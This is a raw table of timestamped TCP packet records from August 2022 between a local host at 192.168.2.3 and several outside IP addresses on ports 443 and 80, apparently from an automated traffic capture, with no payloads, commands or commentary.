Aug 23, 2022 18:25:14.721991062 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.721999884 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.722023964 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.722115040 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.722172976 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.753729105 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.753755093 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.753776073 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.753879070 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.753999949 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.754757881 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.754770994 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.754793882 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.754806995 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.754987955 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.755002975 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.755024910 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.755126953 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.755223989 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.759505987 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.759531975 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.759706020 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.762572050 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.762588978 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.762610912 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.762634039 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.762808084 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.762820959 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.762943029 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.762958050 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.763005018 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.763051033 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.834888935 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.834920883 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.835127115 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.837007046 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.837027073 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.837047100 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.837070942 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.837238073 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.837255955 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.837384939 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.837399960 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.837498903 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.842468977 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.842492104 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.842665911 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.843044996 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.843056917 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.843076944 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.843101025 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.843291044 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.843301058 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.843312025 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.843549967 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.845230103 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.845251083 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.845448017 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.900815010 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.900846958 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.900872946 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.900907993 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.900919914 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.901043892 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.901204109 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.902803898 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.903292894 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.970050097 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:24.549671888 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:25:27.675595999 CEST	49938	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:25:27.675658941 CEST	443	49938	149.154.167.99	192.168.2.3
Aug 23, 2022 18:25:27.675833941 CEST	49938	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:25:27.817034006 CEST	49938	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:25:27.817071915 CEST	443	49938	149.154.167.99	192.168.2.3
Aug 23, 2022 18:25:27.874772072 CEST	443	49938	149.154.167.99	192.168.2.3
Aug 23, 2022 18:25:27.875677109 CEST	49938	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:25:27.914869070 CEST	49938	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:25:27.914896965 CEST	443	49938	149.154.167.99	192.168.2.3
Aug 23, 2022 18:25:27.915304899 CEST	443	49938	149.154.167.99	192.168.2.3
Aug 23, 2022 18:25:27.915678024 CEST	49938	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:25:28.160393953 CEST	49938	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:25:28.203380108 CEST	443	49938	149.154.167.99	192.168.2.3
Aug 23, 2022 18:25:28.850766897 CEST	443	49938	149.154.167.99	192.168.2.3
Aug 23, 2022 18:25:28.850804090 CEST	443	49938	149.154.167.99	192.168.2.3
Aug 23, 2022 18:25:28.850851059 CEST	443	49938	149.154.167.99	192.168.2.3
Aug 23, 2022 18:25:28.850889921 CEST	443	49938	149.154.167.99	192.168.2.3
Aug 23, 2022 18:25:28.856293917 CEST	49938	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:25:28.862456083 CEST	49938	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:25:28.862497091 CEST	443	49938	149.154.167.99	192.168.2.3
Aug 23, 2022 18:25:28.868428946 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:28.906395912 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:28.906593084 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:28.907370090 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:28.944806099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:28.983908892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:28.991758108 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:28.999108076 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.036870956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.037343979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.037379980 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.037405968 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.037429094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.037451029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.037473917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.037497997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.037522078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.037545919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.037569046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.037784100 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.075309038 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075387955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075498104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075537920 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075572014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075603962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075632095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075660944 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075685024 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075705051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075727940 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075751066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075771093 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075793982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075814962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075835943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075858116 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075877905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075900078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.075921059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.090049028 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.095460892 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.096221924 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.127753973 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.127811909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.127840996 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.127867937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.127892017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.127928972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.127954960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.127980947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.128005981 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.128026962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.128055096 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.128079891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.128104925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.128129005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133471012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133502007 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133521080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133538961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133649111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133668900 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133737087 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133759975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133806944 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133832932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133883953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.133929014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134124994 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134156942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134175062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134203911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134246111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134289980 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.134305000 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134346962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134407043 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134499073 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.134547949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134582996 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134602070 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134630919 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.134668112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134685993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.134717941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.136485100 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.137746096 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.137819052 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.171940088 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.171976089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.171999931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172020912 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172043085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172065973 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172091961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172144890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172188997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172221899 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172249079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172270060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172353029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172378063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172400951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172425032 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172445059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172466993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172489882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172514915 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172574043 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172600031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172621965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172672033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172780037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172804117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172827959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172897100 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172920942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172947884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172969103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.172991991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173214912 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.173295975 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.173346043 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.173348904 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173373938 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173392057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173415899 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173445940 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.173456907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173481941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173484087 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.173507929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173515081 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.173532009 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173566103 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.173604012 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.173768997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173795938 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173820972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173846960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173871994 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173897982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173923969 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173965931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.173993111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.174036980 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.174062014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.174084902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.174146891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.174170971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.174194098 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175214052 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175250053 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175271988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175407887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175432920 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175455093 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175478935 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175503016 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175524950 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175548077 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175569057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175590992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175615072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175669909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175693035 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175760031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175784111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175805092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175823927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175843000 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175863981 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175884962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175906897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175929070 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.175949097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.177474022 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.179640055 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.180881977 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.180917025 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.180958986 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.210807085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.210856915 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.210885048 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.210907936 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.210932016 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.210957050 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.210982084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211007118 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211062908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211303949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211335897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211379051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211417913 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211442947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211464882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211488962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211513042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211536884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211560965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211585999 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211611032 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211633921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211654902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211678028 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211702108 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211731911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211756945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211781025 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211802959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211826086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211850882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211874962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211895943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211918116 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211939096 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211962938 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.211985111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212007999 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212030888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212055922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212079048 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212100983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212124109 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212146997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212169886 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212193012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212215900 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212243080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212266922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212291002 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212313890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212337971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212359905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212385893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212409973 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212431908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212454081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212476969 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212502003 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212524891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212548018 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.212570906 CEST	80	49943	88.198.122.116	192.168.2.3
